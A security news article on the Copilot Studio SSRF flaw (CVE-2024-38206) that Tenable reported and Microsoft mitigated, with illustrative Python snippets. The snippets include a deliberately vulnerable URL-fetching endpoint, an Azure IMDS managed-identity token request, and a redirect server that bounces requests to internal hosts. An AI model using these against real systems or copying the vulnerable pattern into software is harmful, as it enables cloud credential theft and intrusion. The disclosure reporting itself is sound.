Researchers have exploited a vulnerability in Microsoft’s Copilot Studio tool that allowed them to make external HTTP requests capable of accessing sensitive information about internal services within a cloud environment, with potential impact across multiple tenants.
Tenable researchers discovered the server-side request forgery (SSRF) flaw in the chatbot creation tool, which they exploited to access Microsoft’s internal infrastructure, including the Instance Metadata Service (IMDS) and internal Cosmos DB instances, they revealed in a blog post this week.
Tracked by Microsoft as CVE-2024-38206, the flaw allows an authenticated attacker to bypass SSRF protection in Microsoft Copilot Studio and leak sensitive cloud-based information over a network, according to a security advisory associated with the vulnerability. The flaw arises from combining an HTTP request that can be created using the tool with an SSRF protection bypass, according to Tenable.
“An SSRF vulnerability occurs when an attacker is able to influence the application into making server-side HTTP requests to unexpected targets or in an unexpected way,” Tenable security researcher Evan Grant explained in the post.
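To make the bug class concrete, here is a minimal, hypothetical sketch (assumed for illustration; this is not Copilot Studio’s actual code) of a server-side endpoint that fetches a user-supplied URL without validating where it points:

```python
# Hypothetical SSRF-prone endpoint, for illustration only.
# The server fetches whatever URL the caller supplies; because the
# request originates server-side, it can reach internal targets
# (e.g., link-local metadata services) that the caller cannot.
from flask import Flask, request
import requests

app = Flask(__name__)

@app.route("/fetch")
def fetch():
    url = request.args.get("url", "")
    # No allowlist, and redirects are followed by default.
    resp = requests.get(url, timeout=5)
    return resp.text

if __name__ == "__main__":
    app.run()
```

Real applications usually wrap such fetches in a blocklist or allowlist; as described below, Tenable’s research shows how those protections can still be bypassed.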
The researchers tested their exploit by creating HTTP requests to access cloud data and services from multiple tenants. They discovered that “while no cross-tenant information appeared immediately accessible, the infrastructure used for this Copilot Studio service was shared among tenants,” Grant wrote.
Any impact on that infrastructure, then, could affect multiple customers, he explained. “While we don’t know the extent of the impact that having read/write access to this infrastructure could have, it’s clear that because it’s shared among tenants, the risk is magnified,” Grant wrote. The researchers also found that they could use their exploit to access other internal hosts, unrestricted, on the local subnet to which their instance belonged.
Microsoft responded quickly to Tenable’s notification of the flaw, and it has since been fully mitigated, with no action required on the part of Copilot Studio users, the company said in its security advisory.
How the CVE-2024-38206 Vulnerability Works
Microsoft launched Copilot Studio late last year as a drag-and-drop, easy-to-use tool for creating custom artificial intelligence (AI) assistants, also known as chatbots. These conversational applications let people perform a variety of large language model (LLM) and generative AI tasks using data ingested from the Microsoft 365 environment, or any other data that the Power Platform, on which the tool is built, can access.
Copilot Studio’s initial release was recently flagged as generally “way overpermissioned” by security researcher Michael Bargury at this year’s Black Hat conference in Las Vegas; he found 15 security issues with the tool that could allow for the creation of flawed chatbots.
The Tenable researchers discovered the tool’s SSRF flaw while looking into SSRF vulnerabilities in the APIs for Microsoft’s Azure AI Studio and Azure ML Studio, which the company itself flagged and patched before the researchers could report them. The researchers then turned their investigative attention to Copilot Studio to see if it could be exploited in a similar way.
Exploiting HTTP Requests to Gain Cloud Access
When creating a new Copilot, people can define Topics, which allow them to specify keywords that a user can say to the Copilot to elicit a specific response or action by the AI; one of the actions that can be performed via Topics is an HTTP request. Indeed, most modern apps that deal with data analysis or machine learning have the ability to make such requests, because of their need to integrate data from external services; the downside is that this can create a potential vulnerability, Grant noted.
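In Azure, the most sensitive internal target for such a request is the IMDS mentioned above, which serves managed identity tokens from a link-local address. The token endpoint below is the standard, documented Azure API, shown on its own for illustration; Tenable’s exact payload through Copilot Studio is not reproduced here:

```python
# Documented Azure IMDS managed-identity token request. This only works
# from inside an Azure instance with a managed identity assigned; it is
# shown to illustrate the target, not the exploit itself.
import requests

IMDS_TOKEN_URL = (
    "http://169.254.169.254/metadata/identity/oauth2/token"
    "?api-version=2018-02-01"
    "&resource=https://management.azure.com/"
)

resp = requests.get(IMDS_TOKEN_URL, headers={"Metadata": "true"}, timeout=2)
resp.raise_for_status()
token = resp.json()["access_token"]  # bearer token for Azure management APIs
```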
The researchers tried requesting access to various cloud resources, as well as leveraging common SSRF protection bypass techniques in their HTTP requests. While many requests yielded System Error responses, the researchers eventually pointed their request at a server they controlled and sent a 301 redirect response aimed at the restricted hosts they had previously tried to reach. Through trial and error, and by combining redirects and SSRF bypasses, the researchers managed to retrieve managed identity access tokens from the IMDS, which they used to access internal cloud resources such as Azure services and a Cosmos DB instance. They also exploited the flaw to gain read/write access to the database.
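The redirect trick is a classic filter bypass: the application checks the initial URL, approves it because it points to an external domain, and then its HTTP client silently follows a redirect to an internal host the filter would have blocked. A minimal sketch of such an attacker-controlled redirect server, illustrating the general technique rather than Tenable’s actual setup:

```python
# Minimal redirect server illustrating the general SSRF-bypass technique.
# The vulnerable app's URL filter sees only the attacker's external
# domain; the app's HTTP client then follows the 301 to a blocked
# internal host. Illustrative only, not Tenable's infrastructure.
from http.server import BaseHTTPRequestHandler, HTTPServer

# Hypothetical internal target; real IMDS calls also require a
# "Metadata: true" header, so a bare redirect is not always enough.
INTERNAL_TARGET = (
    "http://169.254.169.254/metadata/identity/oauth2/token"
    "?api-version=2018-02-01&resource=https://management.azure.com/"
)

class RedirectHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Answer every request with a 301 pointing at the internal target.
        self.send_response(301)
        self.send_header("Location", INTERNAL_TARGET)
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), RedirectHandler).serve_forever()
```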
Though the research proved inconclusive about the extent to which the flaw could be exploited to access sensitive cloud data, it was serious enough to prompt rapid mitigation. Indeed, the existence of the SSRF flaw should be a cautionary tale for Copilot Studio users about the potential for attackers to abuse its HTTP-request feature to elevate their access to cloud data and resources.
“If an attacker is able to control the target of those requests, they could point the request to a sensitive internal resource for which the server-side application has access even if the attacker doesn’t,” Grant warned, “revealing potentially sensitive information.”